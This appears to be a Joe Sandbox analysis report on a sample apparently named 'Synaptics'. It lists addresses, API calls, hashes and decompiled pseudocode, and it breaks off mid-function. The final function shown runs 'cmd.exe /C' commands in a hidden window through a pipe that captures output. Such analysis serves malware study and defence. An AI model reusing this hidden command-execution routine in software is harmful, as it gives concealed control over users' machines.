                                                                                                                                                                                          0x004060fd
                                                                                                                                                                                          0x00406104
                                                                                                                                                                                          0x00406105
                                                                                                                                                                                          0x0040610e
                                                                                                                                                                                          0x0040610f
                                                                                                                                                                                          0x00406127
                                                                                                                                                                                          0x0040612c
                                                                                                                                                                                          0x0040612f
                                                                                                                                                                                          0x00406134
                                                                                                                                                                                          0x0040613a
                                                                                                                                                                                          0x0040613b
                                                                                                                                                                                          0x0040614b
                                                                                                                                                                                          0x0040614d
                                                                                                                                                                                          0x0040615d
                                                                                                                                                                                          0x00406164
                                                                                                                                                                                          0x0040616e
                                                                                                                                                                                          0x0040616f
                                                                                                                                                                                          0x00406174
                                                                                                                                                                                          0x0040617a
                                                                                                                                                                                          0x0040617b
                                                                                                                                                                                          0x00406181
                                                                                                                                                                                          0x00406183
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406183
                                                                                                                                                                                          0x0040614b
                                                                                                                                                                                          0x0040612c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004060fd
                                                                                                                                                                                          0x00406191
                                                                                                                                                                                          0x00406198
                                                                                                                                                                                          0x0040619c
                                                                                                                                                                                          0x0040619d
                                                                                                                                                                                          0x0040619d
                                                                                                                                                                                          0x004060b8
                                                                                                                                                                                          0x004060a5
                                                                                                                                                                                          0x0040608f
                                                                                                                                                                                          0x00406040
                                                                                                                                                                                          0x0040604b
                                                                                                                                                                                          0x0040604f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406051
                                                                                                                                                                                          0x00406051
                                                                                                                                                                                          0x0040605c
                                                                                                                                                                                          0x00406060
                                                                                                                                                                                          0x00406065
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406067
                                                                                                                                                                                          0x0040606a
                                                                                                                                                                                          0x00406071
                                                                                                                                                                                          0x00406075
                                                                                                                                                                                          0x00406076
                                                                                                                                                                                          0x00406076
                                                                                                                                                                                          0x00406065
                                                                                                                                                                                          0x0040604f
                                                                                                                                                                                          0x004061a2
                                                                                                                                                                                          0x004061ab

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00406035
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00406046
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,?,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00406076
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 004060DA
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5,?,80000001), ref: 0040610F
                                                                                                                                                                                          • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000,004062D5), ref: 00406122
                                                                                                                                                                                          • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278,00000000), ref: 0040612F
                                                                                                                                                                                          • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0049B0CC,?,00406278), ref: 0040613B
                                                                                                                                                                                          • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 0040616F
                                                                                                                                                                                          • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 0040617B
                                                                                                                                                                                          • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 0040619D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                                          • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                                          • API String ID: 3245196872-1565342463
                                                                                                                                                                                          • Opcode ID: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                          • Instruction ID: 0b7a158813eaac7eeaad4be5227783dc720e21281ab2719b2f6a7295f4a4c489
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed0f14c5ffc1ee470e050258a8bbec8f9819b0acbec1a10c0da0e6f85c8c8617
                                                                                                                                                                                          • Instruction Fuzzy Hash: B341A272900158AFEB10DBA9CC85BDEB3EDDF44304F1501B7E94AF7282D6389E548B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0045695C Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407windowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                          			E0045695C(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x456ec6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x49de28; // 0x422f40
					E00406A70(_t294,  &_v12);
					E0040D144(_v12, 1);
					E00404378();
				}
				_t149 =  *0x49ebb8; // 0x22b1714
				E0045B100(_t149);
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x456ea9);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x456db0);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x49ebbc; // 0x22b1320
						_t127 = _t160 + 0x6c; // 0x0
						__eflags =  *_t127 - _v8;
						if( *_t127 == _v8) {
							__eflags = 0;
							E00455B08(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E00441704(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E00441704(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E00451750(E00441704(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E00441704(_v8), 0);
								} else {
									SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E00441704(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043EC5C(_v8);
						}
					} else {
						_push(_t372);
						_push(0x456a14);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E00403DE8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004581F4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004581E8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x49ebb8; // 0x22b1714
								_t31 = _t241 + 0x44; // 0x22b2354
								_t305 = E0043A980( *_t31) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x49ebb8; // 0x22b1714
								_t34 = _t245 + 0x44; // 0x22b2354
								_t248 = E0043A9C4( *_t34) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E00454DB8(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E00458224() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E00458218() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x49ebb8; // 0x22b1714
										_t82 = _t262 + 0x44; // 0x22b2354
										_t311 = E0043A980( *_t82) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x49ebb8; // 0x22b1714
										_t85 = _t266 + 0x44; // 0x22b2354
										_t269 = E0043A9C4( *_t85) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x49ebb8; // 0x22b1714
								_t52 = _t270 + 0x44; // 0x22b2354
								_t370 =  *_t52;
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44ff0c; // 0x44ff58
									_t290 = E00403D78( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004581F4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004581E8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t59 = _t370 + 0x48; // 0x115
									_t317 =  *_t59 -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t62 = _t370 + 0x40; // 0xf6
									_t314 = _t318 +  *_t62;
									_t63 = _t370 + 0x4c; // 0x17d
									_t286 =  *_t63 -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t66 = _t370 + 0x44; // 0x72
									_t278 = _t287 +  *_t66;
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E00454DB8(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E00441704(_v8),  *(0x49bee0 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x407538, E00441704(_v8), 5, 0, _t220);
								E0043B1DC();
							} else {
								_t231 = E00441704(_v8);
								_t232 =  *0x49ebb8; // 0x22b1714
								_t105 = _t232 + 0x44; // 0x22b2354
								_t106 =  *_t105 + 0x254; // 0x0
								SendMessageA( *_t106, 0x223, _t231, 0);
								ShowWindow(E00441704(_v8), 3);
							}
							_t226 =  *0x49ebb8; // 0x22b1714
							_t119 = _t226 + 0x44; // 0x22b2354
							_t120 =  *_t119 + 0x254; // 0x0
							SendMessageA( *_t120, 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x456eb0);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































                                                                                                                                                                                          0x0045695d
                                                                                                                                                                                          0x0045695f
                                                                                                                                                                                          0x00456967
                                                                                                                                                                                          0x0045696a
                                                                                                                                                                                          0x0045696f
                                                                                                                                                                                          0x00456970
                                                                                                                                                                                          0x00456975
                                                                                                                                                                                          0x00456978
                                                                                                                                                                                          0x00456982
                                                                                                                                                                                          0x00456993
                                                                                                                                                                                          0x00456998
                                                                                                                                                                                          0x004569a7
                                                                                                                                                                                          0x004569ac
                                                                                                                                                                                          0x004569ac
                                                                                                                                                                                          0x004569b1
                                                                                                                                                                                          0x004569b6
                                                                                                                                                                                          0x004569be
                                                                                                                                                                                          0x004569c7
                                                                                                                                                                                          0x004569c8
                                                                                                                                                                                          0x004569cd
                                                                                                                                                                                          0x004569d0
                                                                                                                                                                                          0x004569da
                                                                                                                                                                                          0x004569e0
                                                                                                                                                                                          0x004569e3
                                                                                                                                                                                          0x004569ea
                                                                                                                                                                                          0x00456d8e
                                                                                                                                                                                          0x00456d8f
                                                                                                                                                                                          0x00456d94
                                                                                                                                                                                          0x00456d97
                                                                                                                                                                                          0x00456da1
                                                                                                                                                                                          0x00456dab
                                                                                                                                                                                          0x00456dc7
                                                                                                                                                                                          0x00456dcc
                                                                                                                                                                                          0x00456dcf
                                                                                                                                                                                          0x00456dd2
                                                                                                                                                                                          0x00456dd4
                                                                                                                                                                                          0x00456dd9
                                                                                                                                                                                          0x00456dd9
                                                                                                                                                                                          0x00456dde
                                                                                                                                                                                          0x00456de1
                                                                                                                                                                                          0x00456de8
                                                                                                                                                                                          0x00456df7
                                                                                                                                                                                          0x00456dfa
                                                                                                                                                                                          0x00456e01
                                                                                                                                                                                          0x00456e22
                                                                                                                                                                                          0x00456e27
                                                                                                                                                                                          0x00456e2e
                                                                                                                                                                                          0x00456e33
                                                                                                                                                                                          0x00456e35
                                                                                                                                                                                          0x00456e40
                                                                                                                                                                                          0x00456e45
                                                                                                                                                                                          0x00456e47
                                                                                                                                                                                          0x00456e56
                                                                                                                                                                                          0x00456e56
                                                                                                                                                                                          0x00456e47
                                                                                                                                                                                          0x00456e58
                                                                                                                                                                                          0x00456e5a
                                                                                                                                                                                          0x00456e8c
                                                                                                                                                                                          0x00456e5c
                                                                                                                                                                                          0x00456e74
                                                                                                                                                                                          0x00456e7a
                                                                                                                                                                                          0x00456e7a
                                                                                                                                                                                          0x00456e03
                                                                                                                                                                                          0x00456e1b
                                                                                                                                                                                          0x00456e1b
                                                                                                                                                                                          0x00456dea
                                                                                                                                                                                          0x00456ded
                                                                                                                                                                                          0x00456ded
                                                                                                                                                                                          0x004569f0
                                                                                                                                                                                          0x004569f2
                                                                                                                                                                                          0x004569f3
                                                                                                                                                                                          0x004569f8
                                                                                                                                                                                          0x004569fb
                                                                                                                                                                                          0x00456a05
                                                                                                                                                                                          0x00456a0f
                                                                                                                                                                                          0x00456a35
                                                                                                                                                                                          0x00456a61
                                                                                                                                                                                          0x00456aaa
                                                                                                                                                                                          0x00456aaa
                                                                                                                                                                                          0x00456aad
                                                                                                                                                                                          0x00456aaf
                                                                                                                                                                                          0x00456ab1
                                                                                                                                                                                          0x00456ab1
                                                                                                                                                                                          0x00456ac1
                                                                                                                                                                                          0x00456ac1
                                                                                                                                                                                          0x00456ac4
                                                                                                                                                                                          0x00456ac6
                                                                                                                                                                                          0x00456ac8
                                                                                                                                                                                          0x00456ac8
                                                                                                                                                                                          0x00456a63
                                                                                                                                                                                          0x00456a63
                                                                                                                                                                                          0x00456a68
                                                                                                                                                                                          0x00456a75
                                                                                                                                                                                          0x00456a78
                                                                                                                                                                                          0x00456a7a
                                                                                                                                                                                          0x00456a7c
                                                                                                                                                                                          0x00456a7c
                                                                                                                                                                                          0x00456a7f
                                                                                                                                                                                          0x00456a84
                                                                                                                                                                                          0x00456a8f
                                                                                                                                                                                          0x00456a92
                                                                                                                                                                                          0x00456a94
                                                                                                                                                                                          0x00456a96
                                                                                                                                                                                          0x00456a96
                                                                                                                                                                                          0x00456a94
                                                                                                                                                                                          0x00456acd
                                                                                                                                                                                          0x00456acf
                                                                                                                                                                                          0x00456acf
                                                                                                                                                                                          0x00456ad3
                                                                                                                                                                                          0x00456ad5
                                                                                                                                                                                          0x00456ad5
                                                                                                                                                                                          0x00456ae5
                                                                                                                                                                                          0x00456aee
                                                                                                                                                                                          0x00456afb
                                                                                                                                                                                          0x00456b04
                                                                                                                                                                                          0x00456b04
                                                                                                                                                                                          0x00456b0e
                                                                                                                                                                                          0x00456b11
                                                                                                                                                                                          0x00456b1c
                                                                                                                                                                                          0x00456b1f
                                                                                                                                                                                          0x00456bf3
                                                                                                                                                                                          0x00456bf5
                                                                                                                                                                                          0x00456bfb
                                                                                                                                                                                          0x00456bfe
                                                                                                                                                                                          0x00456c05
                                                                                                                                                                                          0x00456c4e
                                                                                                                                                                                          0x00456c4e
                                                                                                                                                                                          0x00456c51
                                                                                                                                                                                          0x00456c53
                                                                                                                                                                                          0x00456c55
                                                                                                                                                                                          0x00456c55
                                                                                                                                                                                          0x00456c65
                                                                                                                                                                                          0x00456c65
                                                                                                                                                                                          0x00456c68
                                                                                                                                                                                          0x00456c6a
                                                                                                                                                                                          0x00456c6c
                                                                                                                                                                                          0x00456c6c
                                                                                                                                                                                          0x00456c07
                                                                                                                                                                                          0x00456c07
                                                                                                                                                                                          0x00456c0c
                                                                                                                                                                                          0x00456c19
                                                                                                                                                                                          0x00456c19
                                                                                                                                                                                          0x00456c1c
                                                                                                                                                                                          0x00456c1e
                                                                                                                                                                                          0x00456c20
                                                                                                                                                                                          0x00456c20
                                                                                                                                                                                          0x00456c23
                                                                                                                                                                                          0x00456c28
                                                                                                                                                                                          0x00456c33
                                                                                                                                                                                          0x00456c33
                                                                                                                                                                                          0x00456c36
                                                                                                                                                                                          0x00456c38
                                                                                                                                                                                          0x00456c3a
                                                                                                                                                                                          0x00456c3a
                                                                                                                                                                                          0x00456c38
                                                                                                                                                                                          0x00456c6f
                                                                                                                                                                                          0x00456c71
                                                                                                                                                                                          0x00456c73
                                                                                                                                                                                          0x00456c73
                                                                                                                                                                                          0x00456c73
                                                                                                                                                                                          0x00456c75
                                                                                                                                                                                          0x00456c77
                                                                                                                                                                                          0x00456c79
                                                                                                                                                                                          0x00456c79
                                                                                                                                                                                          0x00456c79
                                                                                                                                                                                          0x00456c92
                                                                                                                                                                                          0x00456c92
                                                                                                                                                                                          0x00456b25
                                                                                                                                                                                          0x00456b25
                                                                                                                                                                                          0x00456b2a
                                                                                                                                                                                          0x00456b2a
                                                                                                                                                                                          0x00456b2d
                                                                                                                                                                                          0x00456b30
                                                                                                                                                                                          0x00456b37
                                                                                                                                                                                          0x00456b3f
                                                                                                                                                                                          0x00456b45
                                                                                                                                                                                          0x00456b4a
                                                                                                                                                                                          0x00456b4c
                                                                                                                                                                                          0x00456b51
                                                                                                                                                                                          0x00456b51
                                                                                                                                                                                          0x00456b4c
                                                                                                                                                                                          0x00456b54
                                                                                                                                                                                          0x00456b56
                                                                                                                                                                                          0x00456b8f
                                                                                                                                                                                          0x00456b8f
                                                                                                                                                                                          0x00456b92
                                                                                                                                                                                          0x00456b94
                                                                                                                                                                                          0x00456b96
                                                                                                                                                                                          0x00456b96
                                                                                                                                                                                          0x00456ba6
                                                                                                                                                                                          0x00456ba6
                                                                                                                                                                                          0x00456ba9
                                                                                                                                                                                          0x00456bab
                                                                                                                                                                                          0x00456bad
                                                                                                                                                                                          0x00456bad
                                                                                                                                                                                          0x00456b58
                                                                                                                                                                                          0x00456b58
                                                                                                                                                                                          0x00456b5e
                                                                                                                                                                                          0x00456b5e
                                                                                                                                                                                          0x00456b61
                                                                                                                                                                                          0x00456b63
                                                                                                                                                                                          0x00456b65
                                                                                                                                                                                          0x00456b65
                                                                                                                                                                                          0x00456b68
                                                                                                                                                                                          0x00456b68
                                                                                                                                                                                          0x00456b6b
                                                                                                                                                                                          0x00456b71
                                                                                                                                                                                          0x00456b71
                                                                                                                                                                                          0x00456b74
                                                                                                                                                                                          0x00456b76
                                                                                                                                                                                          0x00456b78
                                                                                                                                                                                          0x00456b78
                                                                                                                                                                                          0x00456b7b
                                                                                                                                                                                          0x00456b7b
                                                                                                                                                                                          0x00456b7b
                                                                                                                                                                                          0x00456bb0
                                                                                                                                                                                          0x00456bb2
                                                                                                                                                                                          0x00456bb4
                                                                                                                                                                                          0x00456bb4
                                                                                                                                                                                          0x00456bb4
                                                                                                                                                                                          0x00456bb6
                                                                                                                                                                                          0x00456bb8
                                                                                                                                                                                          0x00456bba
                                                                                                                                                                                          0x00456bba
                                                                                                                                                                                          0x00456bba
                                                                                                                                                                                          0x00456bca
                                                                                                                                                                                          0x00456bd3
                                                                                                                                                                                          0x00456bd9
                                                                                                                                                                                          0x00456bdc
                                                                                                                                                                                          0x00456be0
                                                                                                                                                                                          0x00456be9
                                                                                                                                                                                          0x00456be9
                                                                                                                                                                                          0x00456be0
                                                                                                                                                                                          0x00456b1f
                                                                                                                                                                                          0x00456c9b
                                                                                                                                                                                          0x00456cac
                                                                                                                                                                                          0x00456d82
                                                                                                                                                                                          0x00456cb2
                                                                                                                                                                                          0x00456cbc
                                                                                                                                                                                          0x00456d0f
                                                                                                                                                                                          0x00456d23
                                                                                                                                                                                          0x00456d23
                                                                                                                                                                                          0x00456d38
                                                                                                                                                                                          0x00456d40
                                                                                                                                                                                          0x00456cbe
                                                                                                                                                                                          0x00456cc3
                                                                                                                                                                                          0x00456cce
                                                                                                                                                                                          0x00456cd3
                                                                                                                                                                                          0x00456cd6
                                                                                                                                                                                          0x00456cdd
                                                                                                                                                                                          0x00456ced
                                                                                                                                                                                          0x00456ced
                                                                                                                                                                                          0x00456d4e
                                                                                                                                                                                          0x00456d53
                                                                                                                                                                                          0x00456d56
                                                                                                                                                                                          0x00456d5d
                                                                                                                                                                                          0x00456d5d
                                                                                                                                                                                          0x00456cac
                                                                                                                                                                                          0x004569ea
                                                                                                                                                                                          0x00456e93
                                                                                                                                                                                          0x00456e96
                                                                                                                                                                                          0x00456e99
                                                                                                                                                                                          0x00456e9e
                                                                                                                                                                                          0x00456ea1
                                                                                                                                                                                          0x00456ea8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00456CDD
                                                                                                                                                                                            • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LoadMessageSendString
                                                                                                                                                                                          • String ID: @/B
                                                                                                                                                                                          • API String ID: 1946433856-85281795
                                                                                                                                                                                          • Opcode ID: b802bc65ef57ac491deb0d99d8f24958f689bbc59b5020101f6ab40056b0baf1
                                                                                                                                                                                          • Instruction ID: 4b6bfc7c0ddb1c0560f123697eaff68a2ce520b055fb56cf76eb45ff435e8cfa
                                                                                                                                                                                          • Opcode Fuzzy Hash: b802bc65ef57ac491deb0d99d8f24958f689bbc59b5020101f6ab40056b0baf1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 18F14E30A00204EFDB01DBA9C985F9E77F5AB05305F6545B6E944AB3A3D738BE44DB48
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00475384 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158processfilesynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 38%
                                                                                                                                                                                          			E00475384(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr __edx, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				long _v24;
				char _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				struct _STARTUPINFOA _v108;
				struct _PROCESS_INFORMATION _v124;
				char _v380;
				char _v384;
				char _v388;
				CHAR* _t77;
				void* _t112;
				intOrPtr _t125;
				intOrPtr _t126;
				void* _t131;
				void* _t133;
				void* _t134;
				intOrPtr _t135;

				_t133 = _t134;
				_t135 = _t134 + 0xfffffe80;
				_v388 = 0;
				_v384 = 0;
				_v28 = 0;
				_t131 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00404E70(_v8);
				E00404E70(_v12);
				_push(_t133);
				_push(0x4755bb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004049C0(__ecx);
				_v40.nLength = 0xc;
				_v40.bInheritHandle = 0xffffffff;
				_v40.lpSecurityDescriptor = 0;
				CreatePipe( &_v16,  &_v20,  &_v40, 0);
				_push(_t133);
				_push(0x475581);
				_push( *[fs:eax]);
				 *[fs:eax] = _t135;
				E004032B4( &_v108, 0x44);
				_v108.cb = 0x44;
				_v108.dwFlags = 0x101;
				_v108.wShowWindow = 0;
				_v108.hStdInput = GetStdHandle(0xfffffff6);
				_v108.hStdOutput = _v20;
				_v108.hStdError = _v20;
				if(E00409A58(_v12) == 0) {
					E00404A58( &_v28, 0x4755d0);
				} else {
					E00404A58( &_v28, _v12);
				}
				_t77 = E00404E80(_v28);
				E00404CCC( &_v384, _v8, "cmd.exe /C ");
				CreateProcessA(0, E00404E80(_v384), 0, 0, 0xffffffff, 0, 0, _t77,  &_v108,  &_v124);
				asm("sbb ebx, ebx");
				_t112 = 1;
				CloseHandle(_v20);
				if(1 == 0) {
